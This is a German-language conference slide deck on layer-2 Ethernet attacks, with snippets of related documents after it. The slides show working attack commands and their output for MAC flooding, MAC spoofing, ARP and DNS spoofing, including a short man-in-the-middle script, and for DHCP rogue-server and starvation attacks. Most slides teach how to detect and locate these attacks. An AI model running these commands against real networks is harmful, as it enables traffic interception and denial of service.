Hacking the Ethernet

Größe: px
Ab Seite anzeigen:

Download "Hacking the Ethernet"

Transkript

1 Hacking the Ethernet 2B03 Andreas Aurand Network Consultant NWCC, HP 2004 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice Agenda Übersicht Sniffing MAC-Angriffe ARP Spoofing DNS Spoofing DHCP-Angriffe Andere LAN-Angriffe March 31, 2005 Andreas Aurand, HP Network Competence Center 2 1

2 Shared Ethernet Bus-Topologie. Alle Maschinen sind an einem gemeinsam genutzten Bus angeschlossen. Die einzelnen physikalischen Kabel sind über Hubs verbunden, Leiten jedes empfangene Paket an alle verfügbaren Ports weiter Jedes System kann den gesamten Datenverkehr sehen Shared Ethernet bietet keine Sicherheit Ethernetschnittstelle filtert Pakete, die nicht für sie bestimmt sind. Ethernetschnittstelle filtert Pakete, die nicht für sie bestimmt sind. Zielsystem F8-31-A4-2D Befindet sich die Schnittstelle im Promiscuous Mode, werden alle Pakete vom Controller weitergegeben. Paket zum Zielsystem B Angreifer Sender March 31, 2005 Andreas Aurand, HP Network Competence Center 3 Switched Ethernet Systeme sind direkt am Switch angeschlossen. Leitet Pakete nur an Ports weiter, an denen MAC-Adresse des Zielsystems eingetragen ist. Diese Information ist in MAC-Adresstabelle gespeichert Tabelle kann auf verschiedenen Switchtypen unterschiedliche Größe haben Falls MAC-Adresse unbekannt ist, muss Switch die entsprechenden Pakete über alle Ports fluten. Unicast Flooding: Fluten der Pakete im gesamten Layer-2-Netzwerk Switch verhält sich wie ein Hub Pakete sind für Angreifer sichtbar Port 2/17 Zielsystem F8-31-A4-2D Zieladresse ist nicht in der MAC- Adresstabelle eingetragen. Switch flutet das Paket über alle Ports. Port Fa0/24 Zieladresse ist nicht in der MAC-Adresstabelle eingetragen. Switch flutet das Paket über alle Ports. Paket zum Zielsystem F8-31-A4-2D Sender B March 31, 2005 Andreas Aurand, HP Network Competence Center 4 2

3 Sniffing March 31, 2005 Andreas Aurand, HP Network Competence Center 5 Sniffing Angreifer versucht, in Besitz von sensitiven Daten zu gelangen Passwörter, vertrauliche Daten usw. Schnittstelle ist im Promiscuous Mode Default Gateway IP: / 21 MAC: C-07-AC-7B Angreifer (Host attack) IP: / 21 MAC: D-D6 March 31, 2005 Andreas Aurand, HP Network Competence Center 6 3

4 Promiscuous Mode Scanner Erkennen Schnittstellen, die im Promiscuous Mode laufen z.b. prodetect, Promiscan, anti_sniff oder Cain March 31, 2005 Andreas Aurand, HP Network Competence Center 7 Cain - MAC Scanner Host nicht im Promiscuous Mode March 31, 2005 Andreas Aurand, HP Network Competence Center 8 4

5 Cain - MAC Scanner Host im Promiscuous Mode March 31, 2005 Andreas Aurand, HP Network Competence Center 9 MAC-Angriffe March 31, 2005 Andreas Aurand, HP Network Competence Center 10 5

6 Switched Ethernet Aufbau der MAC-Adresstabelle Port 2/17 Sender F8-31-A4-2D Switch trägt die neue MAC- Adresse mit dem zugehörigen Port in seine Tabelle ein. Port Fa0/24 Switch trägt die neue MAC-Adresse mit dem zugehörigen Port in seine Tabelle ein. # show mac-address-table address 0000.F831.A42D Non-static Address Table: Destination Address Address Type VLAN Destination Port f831.a42d Dynamic 1 FastEthernet0/24 Zielsystem B MAC-Adresse ist in der Tabelle vorhanden Switch filtert Paket. Switch filtert Paket. Port 2/17 Zielsystem F8-31-A4-2D Port Fa0/24 Paket zum Zielsystem F8-31-A4-2D Sender B March 31, 2005 Andreas Aurand, HP Network Competence Center 11 MAC Flooding Angreifer versucht die MAC-Adresstabelle aufzufüllen Tools: macof oder pktgen linny:~ # macof -i eth1 -n macof: c:55:87:40:a3:81 -> 6a:b2:2a:33:a4:d6 macof: 2e:4d:22:56:a2:e5 -> 31:cc:e:1e:5b:6 macof: 3d:20:31:22:f6:c6 -> 43:a2:31:46:e0:c3 cat5000> (enable) show cam count dyn Total Matching CAM Entries = Pakete mit unterschiedlichen MAC-Quelladressen 2/17 Cat5000 1/2 Cat2924C Fa0/24 Rechner A Angreifer "attack" Paket für Rechner C 2/18 Paket für Rechner C Paket für Rechner C Paket für Rechner C Rechner C Rechner B March 31, 2005 Andreas Aurand, HP Network Competence Center 12 6

7 MAC Flooding Überlauf der Forwarding-Tabelle über SNMP auslesen.iso.org.dod.internet.mgmt.mib-2.dot1dbridge.dot1dtp.dot1dtplearnedentrydiscards # macof -i eth1 -n >/dev/null 2>&1 & # snmpget -c public mib (mib-2 = ) SNMPv2-SMI::mib = Counter32: 4427 March 31, 2005 Andreas Aurand, HP Network Competence Center 13 MAC Spoofing Angreifer verwendet MAC-Adresse eines bekannten Systems Angreifer kann Pakete nicht an das Zielsystem weiterleiten DoS-Angriff oder Rogue Server Default Gateway IP: MAC: 00:10:7b:36:4e:80 HTTP Server IP: MAC: F8-71-2E-B3 3/15 3/15 3/13 3/13 Angreifer IP: MAC: 00:60:97:80:9d:d6 Angreifer IP: MAC: 00:04:c1:7d:d6:54 Pakete mit Quelladresse: 00:60:97:80:9d:d6 Pakete mit Quelladresse: F8-71-2E-B3 attack# macchanger --mac=00:10:7b:36:4e:80 eth0 Current MAC: 00:60:97:80:9d:d6 (3com Corporation) Faked MAC: 00:10:7b:36:4e:80 (Cisco Systems, Inc.) March 31, 2005 Andreas Aurand, HP Network Competence Center 14 7

8 MAC Spoofing Forwarding-Tabelle nach MAC-Adresse durchsuchen MAC-Adresse in Dezimalwert umwandeln 00:10:7b:36:4e:80 = SNMP dot1tpfdbport-variable abfragen # snmpget mib SNMPv2-SMI::mib = INTEGER: 67 ifindex für Spanning-Tree-Portnummer suchen # snmpget mib SNMPv2-SMI::mib = INTEGER: 13 ifname für ifindex suchen snmpget mib IF-MIB::ifName.12 = STRING: 2/3 Portbezeichnung auf dem Switch ifindex-nummer Spanning-Tree Portnummer March 31, 2005 Andreas Aurand, HP Network Competence Center 15 Switchport zu MAC-Adresse zuordnen cammer (perl-skript, Teil von MRTG) #./cammer.pl public@ public@ * Gather VLAN index Table from Switch ARRAY(0x815acdc) * Gather Interface Name Table from Switch ARRAY(0x8171a9c) * Gather Arp Table from Router ARRAY(0x8171b38) * Gather Mac 2 Port and Port 2 Interface table for all VLANS 1/1 1 00:90:f2:40:bb:17 2/ :10:7b:36:4e:80 2/ :60:5c:f4:72:6f nixat2.frs-lab.de 2/12 1 aa:00:04:00:6f:fc c frs-lab.de 2/12 82 aa:00:04:00:6f:fc c frs-lab.de 2/ aa:00:04:00:6f:fc c frs-lab.de 2/ :0e:7f:5c:f6: p2650.frs-lab.de 2/ :0a:57:05:f5: p5308xl-2.frs-lab.de 2/ :0e:7f:5c:f6:f8 2/ :50:54:14:ab:fb 2/ :01:63:55:9b:07 2/ :00:f8:71:2a: cpsp.frs-lab.de 2/ :01:e7:96:a9: p5308xl-1.frs-lab.de 2/ :50:54:14:ab:ff cat5000-sup2.frs-lab.de 2/ :00:00:00:fe:00 2/ :10:7b:3b:5c:a c2501.frs-lab.de 2/ :01:63:55:9b:07 2/ :01:63:55:9b:07 2/ :01:63:55:9b:07 2/ :01:63:55:9b:07 2/9 1 00:10:7b:7f:b6:c c frs-lab.de March 31, 2005 Andreas Aurand, HP Network Competence Center 16 8

9 Netdisco Zuordnung einer MAC-Adresse zu einem Switchport March 31, 2005 Andreas Aurand, HP Network Competence Center 17 Netdisco Device-Informationen March 31, 2005 Andreas Aurand, HP Network Competence Center 18 9

10 Netdisco Netzwerk-Topologie March 31, 2005 Andreas Aurand, HP Network Competence Center 19 ARP-Guard Meldet automatisch MAC-Spoofing-Angriff March 31, 2005 Andreas Aurand, HP Network Competence Center 20 10

11 ARP-Guard Informationen über den Angriff March 31, 2005 Andreas Aurand, HP Network Competence Center 21 ARP-Guard Lokalisierung des Angriffs March 31, 2005 Andreas Aurand, HP Network Competence Center 22 11

12 ARP-Guard Übersicht über die verschiedenen Switchports March 31, 2005 Andreas Aurand, HP Network Competence Center 23 ARP Spoofing March 31, 2005 Andreas Aurand, HP Network Competence Center 24 12

13 Wie funktioniert der ARP Cache? Protokolltyp unterstützt? Ja Nein Nein Handelt es es sich um einen Request? Merge_Flag := False Eintrag für Senderpaar im im ARP Cache? Ja Eintrag im ARP Cache erneuern und Merge_Flag := := True 1 Ja Lokale HW- und Protokolladresse in in die Senderfelder eintragen Operation-Feld auf ares_op$reply setzen Nein Nein IP-Adresse des Zielsystems = lokale Adresse Reply-Paket als Unicast an anhw-adresse des Zielsystems senden Ja Merge Flag = False? Ja 2 Neuen Eintrag im ARP Cache anlegen Der ARP Reply wird immer als Unicast an die MAC-Adresse gesendet, die im Request-Paket als Sender MAC Address eingetragen ist. Nein March 31, 2005 Andreas Aurand, HP Network Competence Center 25 ARP Spoofing Bestehende Einträge im ARP Cache durch gefälschte ARP- Pakete modifizieren und neue Einträge hinzufügen ARP Spoofing oder ARP Cache Poisoning Ermöglicht DoS- und MitM-Attacken Gratuitous ARP ARP Reply Broadcast um einen bestehenden Eintrag auf allen Systemen des LANs abzuändern Häufig benutzt, um ARP-Eintrag des Default Gateway auf allen Hosts eines Subnetzes zu modifizieren March 31, 2005 Andreas Aurand, HP Network Competence Center 26 13

14 arpspoof Default Gateway IP: MAC: c-f4-72-6f # arp -a at 00:60:97:80:9D:D6 Angreifer (Host attack) IP: MAC: D-D6 Angriff über ARP Request oder Reply Angegriffene Rechner attack# arpspoof -i eth Ethernet II, Src: 00:60:97:80:9d:d6, Dst: ff:ff:ff:ff:ff:ff Address Resolution Protocol (reply) Opcode: reply (0x0002) Sender MAC address: 00:60:5c:f4:72:6f Sender IP address: Target MAC address: ff:ff:ff:ff:ff:ff (Broadcast) Target IP address: ( ) attack# arpspoof -i eth0 -t Ethernet II, Src: 00:60:97:80:9d:d6, Dst: 00:00:f8:71:2e:b3 Address Resolution Protocol (reply) Opcode: reply (0x0002) Sender MAC address: 00:60:97:80:9d:d6 Sender IP address: ) Target MAC address: 00:00:f8:71:2e:b3 Target IP address: Gratuitous ARP wird als Broadcast gesendet. March 31, 2005 Andreas Aurand, HP Network Competence Center 27 arpwatch ARPwatch erkennt Änderungen in der Zuordnung zwischen IP- und MAC-Adresse # arpwatch -dn -i eth1 -f /usr/local/var/log/arp.dat From: arpwatch (Arpwatch) To: root Subject: changed ethernet address (router.frs-lab.de) hostname: router.frs-lab.de ip address: ethernet address: 0:60:97:80:9d:d6 Nach dieser Adresse in der Forwardingethernet vendor: 3COM CORPORATION Tabelle suchen. old ethernet address: 0:60:5c:f4:72:6f old ethernet vendor: CISCO SYSTEMS, INC. timestamp: Sunday, February 6, :16: previous timestamp: Sunday, February 6, :15: delta: 1 minute March 31, 2005 Andreas Aurand, HP Network Competence Center 28 14

15 arpwatch # cat /usr/local/var/log/ arp.dat 0:60:5c:f4:72:6f router 0:60:97:80:9d:d router 0:0:f8:71:2a: cpsp 0:0:f8:71:2e:b unix 0:60:97:80:9d:d linny 0:0:f8:70:7c: pc March 31, 2005 Andreas Aurand, HP Network Competence Center 29 tethereal Statistik für ARP-Pakete mit tethereal erzeugen Anzeige der MAC-Adressen bei Summary-Ausgabe # more ~/.ethereal/preferences column.format: "Time", "%Yt","MAC Source", "%uhs", "MAC Destination", "%uhd", "Source", "%s", "Destination","%d", "Protocol", "%p", "Info", "%i" Script für periodische Statistik # cat arpstat #!/bin/bash while true; do tethereal -a duration:60 -qz conv,eth -i eth1 arp; date; done; March 31, 2005 Andreas Aurand, HP Network Competence Center 30 15

16 tethereal Erkennen von Gratuitous ARP # arpstat Capturing on eth1 44 packets captured ================================================================================ <- -> Total Frames Bytes Frames Bytes Frames Bytes 00:60:97:80:9d:d6 <-> ff:ff:ff:ff:ff:ff :00:f8:71:2a:74 <-> 00:00:f8:71:2e:b :00:f8:71:2e:b3 <-> 00:60:97:80:9d:d ================================================================================ Fri Feb 4 15:28:19 MET Capturing on eth1 49 packets captured ================================================================================ <- -> Total Frames Bytes Frames Bytes Frames Bytes 00:60:97:80:9d:d6 <-> ff:ff:ff:ff:ff:ff :00:f8:71:2a:74 <-> 00:90:f2:40:bb: :00:f8:71:2a:74 <-> ff:ff:ff:ff:ff:ff ================================================================================ Fri Feb 4 15:29:22 MET March 31, 2005 Andreas Aurand, HP Network Competence Center 31 tethereal Erkennen von "normalem" ARP Spoofing # arpstat Capturing on eth1 42 packets captured ================================================================================ <- -> Total Frames Bytes Frames Bytes Frames Bytes 00:60:97:80:9d:d6 <-> 00:00:f8:71:2e:b :00:f8:71:2e:b3 <-> 00:60:97:80:9d:d :00:f8:71:2a:74 <-> 00:60:5c:f4:72:6f :00:f8:71:2a:74 <-> 00:10:7b:7f:b6: :10:7b:7f:b6:60 <-> ff:ff:ff:ff:ff:ff :00:f8:71:2a:74 <-> ff:ff:ff:ff:ff:ff ================================================================================ Fri Feb 4 15:33:33 MET Anschließend kann man Switchport für die MAC-Adresse 00:60:97:80:9d:d6 über Bridge MIB bestimmen. March 31, 2005 Andreas Aurand, HP Network Competence Center 32 16

17 ARP-Guard Meldet automatisch ARP-Spoofing-Angriff March 31, 2005 Andreas Aurand, HP Network Competence Center 33 ARP-Guard Informationen über den Angriff March 31, 2005 Andreas Aurand, HP Network Competence Center 34 17

18 ARP-Guard Lokalisierung des Angriffs March 31, 2005 Andreas Aurand, HP Network Competence Center 35 DNS Spoofing March 31, 2005 Andreas Aurand, HP Network Competence Center 36 18

19 DNS Spoofing Oft für Man-in-the-Middle-Attacken benutzt Verschlüsselte Verbindungen terminieren angreifendem Rechner SSH HTTPS Angreifer beantwortet DNS Query mit eigenem DNS Response Reply-Adresse ist seine eigene IP-Adresse Angreifer muss DNS Queries empfangen können ARP Spoofing MAC Flooding March 31, 2005 Andreas Aurand, HP Network Competence Center 37 DNS Spoofing Server (Host Session zwischen dem Angreifer und dem eigentlichen Server Default Gateway IP: / 21 MAC: F8-71-2E-B3 Angegriffener Rechner IP: / 21 MAC: AA FD DNS Server DNS Queries gehen immer zuerst zum Angreifer. DNS Angreifer Query (Host: (Host attack) IP: / 21 MAC: D-D6 DNS Response (Host: IP: ) Die DNS Response des Angreifers enthält seine IP-Adresse. March 31, 2005 Andreas Aurand, HP Network Competence Center 38 19

20 SSHv1 MitM-Attacke Fingerabdruck des öffentlichen Server Keys 38:23:ef:ab:34:13:43:ce:16:3d:c0:c5:dc:d4:93:5b SSH Server (Host SSH Session zwischen dem Angreifer und dem eigentlichen Server. Angegriffener Rechner (Host pcdepp) IP: SSH Session zwischen dem Client und dem Angreifer. DNS Server Default Gateway IP: / 21 Angreifer (Host attack) IP: March 31, 2005 Andreas Aurand, HP Network Competence Center 39 dnsspoof (dsniff-tool) Script für DNS Spoofing attack# cat mitm # # Enable Forwarding and disable sending ICMP Redirects # echo "1" > /proc/sys/net/ipv4/ip_forward echo "0" > /proc/sys/net/ipv4/conf/eth0/send_redirects # # Enable ARP and DNS Spoofing IP-Adresse des Default Gateway # arpspoof -i eth >/dev/null & dnsspoof -i eth0 -f dnsspoof.hosts host >/dev/null & # cat dnsspoof.hosts IP-Adresse des angegriffenen Rechners IP-Adresse, die vom Angreifer als Reply auf einen DNS Request für zurückgesendet wird. March 31, 2005 Andreas Aurand, HP Network Competence Center 40 20

21 tethereal Erkennen von DNS Spoofing durch tethereal # tethereal -lni eth1 not ether src 00:00:f8:71:2e:b3 and udp src port 53 Capturing on eth :02: :60:97:80:9d:d6 -> aa:00:04:00:37:fd > DNS Standard query response A :02: :60:97:80:9d:d6 -> aa:00:04:00:37:fd > DNS Standard query response A Anschließend kann man Switchport für die MAC-Adresse 00:60:97:80:9d:d6 über Bridge MIB bestimmen. March 31, 2005 Andreas Aurand, HP Network Competence Center 41 DHCP-Angriffe March 31, 2005 Andreas Aurand, HP Network Competence Center 42 21

22 DHCP Rogue Server Angreifer setzt eigenen DHCP-Server ab um Clients mit falschen Informationen zu versorgen. Ermöglicht DoS- als auch MitM-Attacken Falls DHCP Client die IP-Adresse vorgibt, funktioniert Angriff nicht Default Gateway Angegriffener DHCP Client Normaler DHCP Server Angreifender Rogue Server Rückverkehr geht vom Default Gateway direkt zum Client. Alle vom Client gesendeten Pakete gehen über den Angreifer. DHCP Offer mit als Default Gateway March 31, 2005 Andreas Aurand, HP Network Competence Center 43 DHCP Gobbler IP-Adressen für Gateway (G), DNS-Server (D) und DHCP-Server (A) attack#./gobbler -m 1 -D G A DHCP gobbler v0.66 from Man the middle attack Trying to gobble address to be used in man in the middle attack DHCP Discover packet constructed and injected, wrote all 342 bytes Sniffing DHCP packets... Got a DHCP OFFER packet DHCP request packet constructed and injected, wrote all 342 bytes Sniffing DHCP packets... Got a DHCP ACK packet gobbled... Total: 1 Rogue Server allokiert eine Adresse Address(es) to be spoofed vom richtigen DHCP-Server. Sniffing for discover messages Sniffing DHCP packets... Got A DHCP discover packet... a host is trying to find a valid IP Time to do the dirty work DHCP Offer packet constructed and injected, wrote all 342 bytes Sniffing DHCP packets... got a dhcp request packet Transaction compare passed... Request IP: Wenn Client ein DHCP Discover sendet, schickt Rogue Server ein DHCP Offer mit der gestohlenen IP-Adresse Offerd IP: sowie den Informationen über das neue Default Gateway und den neuen DNS-Server an Client zurück. Sent + Requested IP's match... sending ack Creating an Ack packet DHCP ACK packet constructed and injected, wrote all 342 bytes Man in the middle should be established m00 m4m4m4m4 Just checking incase of other servers weren't happy (waiting for 10 seconds) Sniffing DHCP packets... March 31, 2005 Andreas Aurand, HP Network Competence Center 44 22

23 tethereal tethereal protokolliert DHCP Replies, die andere MAC- Adresse als der eigentliche DHCP-Server verwenden. MAC-Adresse des "richtigen" DHCP-Servers. # tethereal -Nmnt -li eth1 not ether src aa:00:04:00:6f:fc and udp dst port 68 Capturing on eth :12: :10:7b:7f:b6:c1 -> ff:ff:ff:ff:ff:ff > DHCP DHCP Offer - Transaction ID 0x133b Anschließend kann man Switchport für die MAC-Adresse 00:10:7b:7f:b6:c1 über Bridge MIB bestimmen. March 31, 2005 Andreas Aurand, HP Network Competence Center 45 DHCP Starvation Angreifer spooft den DHCP Packet Exchange Fordert alle verfügbaren IP-Adressen vom Servers an Server kann Clients keine Adresse mehr zuweisen DoS-Attacke auf den DHCP-Server. DHCP-Server Da DHCP-Server seine ganzen Adressen vergeben hat, kann er DHCP Requests der Clients nicht mehr beantworten. DHCP Request Vorgetäuschter DHCP-Paketaustausch Angreifer DHCP Clients attack# DHCPGobbler -g Detecting DHCP service for gobble attack DHCP server at 1A offering with subnet mask gateway and DNS gobbled using MAC 0:28:c:a8:5e:a gobbled using MAC 0:a8:25:24:5e: gobbled using MAC 0:48:c4:b3:a9:a gobbled using MAC 0:3c:63:ab:41:f gobbled using MAC 0:73:92:a7:75:1b. Für jede Anforderung muss eine neue MAC-Adresse verwendet werden March 31, 2005 Andreas Aurand, HP Network Competence Center 46 23

24 tethereal tethereal protokolliert alle DHCP Requests # ethereal -a duration:300 -i tu0 -qz conv,ether udp dst port 67 ================================================================================ Ethernet Conversations Filter:<No Filter> <- -> Total Frames Bytes Frames Bytes Frames Bytes 08:00:2b:2b:98:32 <-> ff:ff:ff:ff:ff:ff :00:2b:93:2f:8a <-> ff:ff:ff:ff:ff:ff :00:2b:a2:7d:08 <-> ff:ff:ff:ff:ff:ff ================================================================================ March 31, 2005 Andreas Aurand, HP Network Competence Center 47 Andere LAN-Attacken March 31, 2005 Andreas Aurand, HP Network Competence Center 48 24

25 Andere LAN-Attacken Spanning-Tree-Attacken Schutz durch richtige Konfiguration der Switches Festlegen an welchen Ports andere Switches angeschlossen werden dürfen Festlegen über welche Ports die Root Bridge gesehen werden darf VLAN-Attacken Schutz durch richtige Konfiguration der Switches Eigenes VLAN für Trunk-Verbindungen VLAN 1 nicht verwenden March 31, 2005 Andreas Aurand, HP Network Competence Center 49 file2cable sendet Binärdatei als Ethernet Frame # tethereal -x -ni eth0 ether dst 01:80:c2:00:00:00 Capturing on eth :01:63:55:9a:f1 -> 01:80:c2:00:00:00 STP Conf. Root = 0/00:0e:7f:5c:f6:80 Cost = 3019 Port = 0x c a f cU...&BB e 7f 5c f \ b cb a PT...B f xxd: Umwandlung der Text- in eine Binärdatei. Der mit tethereal erzeugte HEX Output wird in die Datei stp.txt kopiert. # xxd -r stp.txt stp.bin # file2cable -v -i eth0 -f stp.bin file2cable - by FX <fx@phenoelit.de> Thanx got to Lamont Granquist & fyodor for their hexdump() stp.bin - 60 bytes raw data 0180 c af cU...&BB e 7f5c f \... 0bcb a PT...B f Packet length: 60 March 31, 2005 Andreas Aurand, HP Network Competence Center 50 25

26 Netdisco Anzeige der Ports, die auf Blocking stehen March 31, 2005 Andreas Aurand, HP Network Competence Center 51 LAN-Sicherheit March 31, 2005 Andreas Aurand, HP Network Competence Center 52 26

27 Tools DSNIFF Tools (macof, arpspoof, dnsspoof, sshmitm ) Cain Ethereal (tethereal) Netdisco March 31, 2005 Andreas Aurand, HP Network Competence Center 53 Tools macchanger arpwatch DHCP Gobbler file2cable March 31, 2005 Andreas Aurand, HP Network Competence Center 54 27

28 Tools MRTG (Multi Router Traffic Grapher) contrib/cammer ARP-Guard (kommerziell) ARP Spoofing MAC Spoofing MAC Flooding Zuordnung zwischen Switchport und MAC-Adresse March 31, 2005 Andreas Aurand, HP Network Competence Center 55 Fragen???????? March 31, 2005 Andreas Aurand, HP Network Competence Center 56 28

Ethernet Hacking 2B03. Agenda. Angriffsszenarien MAC-Angriffe. Spanning Tree und andere VLAN Attacken IP-basierende Angriffe.

Ethernet Hacking 2B03. Agenda. Angriffsszenarien MAC-Angriffe. Spanning Tree und andere VLAN Attacken IP-basierende Angriffe. Ethernet Hacking 2B03 Andreas Aurand Network Consultant NWCC, HP 2004 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice Agenda Angriffsszenarien

Mehr

Shared Ethernet bietet keine Sicherheit. Ethernetschnittstelle filtert Pakete, die nicht für sie bestimmt sind.

Shared Ethernet bietet keine Sicherheit. Ethernetschnittstelle filtert Pakete, die nicht für sie bestimmt sind. Schwachstellen in lokalen Netzwerken 3C04 Andreas Aurand Network Consultant NWCC, HP 2004 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice

Mehr

Academy-Day FH Bielefeld. Demo-Lab-Vorschlag zu CCNA 6: Layer 2 Sicherheit

Academy-Day FH Bielefeld. Demo-Lab-Vorschlag zu CCNA 6: Layer 2 Sicherheit Academy-Day-2016 FH Bielefeld Demo-Lab-Vorschlag zu CCNA 6: Layer 2 Sicherheit Agenda: Kurzer Überblick neuer CCNA-6 Inhalte Layer 2 Switche und Sicherheit L2- Sicherheitsmechanismen allgemein Einfache

Mehr

Netzwerk Teil 1 Linux-Kurs der Unix-AG

Netzwerk Teil 1 Linux-Kurs der Unix-AG Netzwerk Teil 1 Linux-Kurs der Unix-AG Andreas Teuchert 5. Januar 2015 Wiederholung: OSI-Schichtenmodell Layer 1: Physical Layer (Kabel, Funk) Layer 2: Data Link Layer (Ethernet, WLAN) Layer 3: Network

Mehr

CCNA Exploration Network Fundamentals. ARP Address Resolution Protocol

CCNA Exploration Network Fundamentals. ARP Address Resolution Protocol CCNA Exploration Network Fundamentals ARP Address Resolution Protocol ARP: Address resolution protocol 1. Eigenschaften ARP-Cache Aufbau 2. Ablauf Beispiel Flussschema 3. ARP-Arten 4. Sicherheit Man-In-The-Middle-Attacke

Mehr

Mobile Web-Technologien. Interaktionen und

Mobile Web-Technologien. Interaktionen und Mobile Web-Technologien Interaktionen und Mobile Blockseminar Medien 02.-05. Januar 2005 11.07.2005 Man-in-the-middle Angriffe Research Group Embedded Interaction www.hcilab.org Victor Czenter Research

Mehr

LAN-Sicherheit. Schwachstellen, Angriffe und Schutzmechanismen in lokalen Netzwerken - am Beispiel von Cisco Catalyst Switches. von Andreas Aurand

LAN-Sicherheit. Schwachstellen, Angriffe und Schutzmechanismen in lokalen Netzwerken - am Beispiel von Cisco Catalyst Switches. von Andreas Aurand LAN-Sicherheit Schwachstellen, Angriffe und Schutzmechanismen in lokalen Netzwerken - am Beispiel von Cisco Catalyst Switches von Andreas Aurand 1. Auflage LAN-Sicherheit Aurand schnell und portofrei erhältlich

Mehr

ARProtokoll Schwächen. Felix Gröbert 2004 - Version 1.0 http://groebert.org/felix/

ARProtokoll Schwächen. Felix Gröbert 2004 - Version 1.0 http://groebert.org/felix/ ARProtokoll Schwächen Felix Gröbert 2004 - Version 1.0 http://groebert.org/felix/ Vortrags Struktur Protokoll Angriffstechniken Angriffsszenarios Programme Resultate Demo Motivation? 70% der Angriffe von

Mehr

Netzwerk Teil 1 Linux-Kurs der Unix-AG

Netzwerk Teil 1 Linux-Kurs der Unix-AG Netzwerk Teil 1 Linux-Kurs der Unix-AG Zinching Dang 30. November 2015 OSI-Schichtenmodell Layer 1: Physical Layer (Koaxial-Kabel, Cat5/6-Kabel, Luft für Funkübertragung) Layer 2: Data Link Layer (Ethernet,

Mehr

VLAN Security 3B04. Andreas Aurand Network Consultant HP NWCC. DECUS Symposium 2003. Warum Ethernet Security? Mögliche Angriffsszenarien MAC-Angriffe

VLAN Security 3B04. Andreas Aurand Network Consultant HP NWCC. DECUS Symposium 2003. Warum Ethernet Security? Mögliche Angriffsszenarien MAC-Angriffe VLAN Security 3B04 Andreas Aurand Network Consultant HP NWCC DECUS Symposium 2003 Agenda Warum Ethernet Security? Mögliche Angriffsszenarien MAC-Angriffe MAC Flooding MAC Spoofing Port Security IEEE 802.1X

Mehr

Packetsniffer. Jens Zentgraf. 26. Juli Zentgraf Packetsniffer 26. Juli / 21

Packetsniffer. Jens Zentgraf. 26. Juli Zentgraf Packetsniffer 26. Juli / 21 Packetsniffer Jens Zentgraf 26. Juli 2015 Zentgraf Packetsniffer 26. Juli 2015 1 / 21 Outline 1 Was ist ein Packetsniffer? 2 Netzwerkaufbau 3 Aufbau eines Sniffers Socket Aufarbeitung der Daten Wireshark

Mehr

CCNA Exploration Network Fundamentals. ARP Address Resolution Protocol

CCNA Exploration Network Fundamentals. ARP Address Resolution Protocol CCNA Exploration Network Fundamentals ARP Address Resolution Protocol ARP: Address resolution protocol 1. Eigenschaften ARP-Cache Aufbau 2. Ablauf Beispiel Flussschema 3. ARP-Arten 4. Sicherheit Man-In-The-Middle-Attacke

Mehr

Statisches Routing. Jörn Stuphorn Bielefeld, den Juni Juni Universität Bielefeld Technische Fakultät

Statisches Routing. Jörn Stuphorn Bielefeld, den Juni Juni Universität Bielefeld Technische Fakultät Statisches Routing Jörn Stuphorn stuphorn@rvs.uni-bielefeld.de Universität Bielefeld Technische Fakultät Stand der Veranstaltung 13. April 2005 Unix-Umgebung 20. April 2005 Unix-Umgebung 27. April 2005

Mehr

Vortrag Rechnernetze. Thema: Arp Spoofing. Stev Eisenhardt / Inf04. Seite 1

Vortrag Rechnernetze. Thema: Arp Spoofing. Stev Eisenhardt / Inf04. Seite 1 Vortrag Rechnernetze Thema: Arp Spoofing Von: Stev Eisenhardt / Inf04 Seite 1 Übersicht: Definitionen Seite 3 Arten von Spoofing Seite 4 Praktische Beispiele.. Seite 7 Spoofing von SSL Verbindungen.. Seite

Mehr

Übung - Mit Wireshark eine UDP-DNS-Aufzeichnung untersuchen

Übung - Mit Wireshark eine UDP-DNS-Aufzeichnung untersuchen Übung - Mit Wireshark eine UDP-DNS-Aufzeichnung untersuchen Topologie Lernziele Teil 1: Wireshark für das Erfassen von Paketen vorbereiten Auswahl einer geeigneten Netzwerk-Schnittstelle, um Pakete zu

Mehr

1 Schwachstellen, Angriffe und Schutzmaßnahmen in lokalen Netzen

1 Schwachstellen, Angriffe und Schutzmaßnahmen in lokalen Netzen 1 1 Schwachstellen, Angriffe und Schutzmaßnahmen in lokalen Netzen 1.1 Überblick über die Schwachstellen Bei der Beurteilung der Schwachstellen von lokalen Netzwerken sollte man zuerst die Unterschiede

Mehr

Thomas Schön Albert-Ludwigs-Universität Freiburg

Thomas Schön Albert-Ludwigs-Universität Freiburg Thomas Schön Albert-Ludwigs-Universität Freiburg Address Resolution Protocol 1) Funktionsweise a) Der ARP Cache b) Paketformat 2) Spezielle Formen a) Proxy ARP b) Gratuitous ARP c) Reverse ARP (RARP) 3)

Mehr

Chapter 8 Ethernet-Switching. CCNA 1 version 3.0 Wolfgang Riggert,, FH Flensburg auf der Grundlage von

Chapter 8 Ethernet-Switching. CCNA 1 version 3.0 Wolfgang Riggert,, FH Flensburg auf der Grundlage von Chapter 8 Ethernet-Switching CCNA 1 version 3.0 Wolfgang Riggert,, FH Flensburg auf der Grundlage von Rick Graziani Cabrillo College Vorbemerkung Die englische Originalversion finden Sie unter : http://www.cabrillo.cc.ca.us/~rgraziani/

Mehr

Übung Prüfen von Ethernet-Rahmen mit Wireshark

Übung Prüfen von Ethernet-Rahmen mit Wireshark Topologie Lernziele Teil 1: Prüfen der Header-Felder in einem Ethernet-II-Rahmen Teil 2: Analysieren und Erfassen von Ethernet-Rahmen mit Wireshark Hintergrund / Szenario Wenn höhere Schichtprotokolle

Mehr

Multicast & Anycast. Jens Link FFG2012. jenslink@quux.de. Jens Link (jenslink@quux.de) Multicast & Anycast 1 / 29

Multicast & Anycast. Jens Link FFG2012. jenslink@quux.de. Jens Link (jenslink@quux.de) Multicast & Anycast 1 / 29 Multicast & Anycast Jens Link jenslink@quux.de FFG2012 Jens Link (jenslink@quux.de) Multicast & Anycast 1 / 29 Übersicht 1 Multicast 2 Anycast Jens Link (jenslink@quux.de) Multicast & Anycast 2 / 29 Wer

Mehr

Das Netzwerk von Docker. Java Stammtisch Goettingen

Das Netzwerk von Docker. Java Stammtisch Goettingen Das Netzwerk von Docker ist work in progress Ausgangslage Linux System (Netz bei Windows und MAC anders) Ein Ethernet-Interface mit oeffentlicher Adresse enp4s0 Ethernet Hwaddr c8:60:00:88:70:55 inet addr:134.76.82.240

Mehr

7. OSI-Modell als Rollenspiel

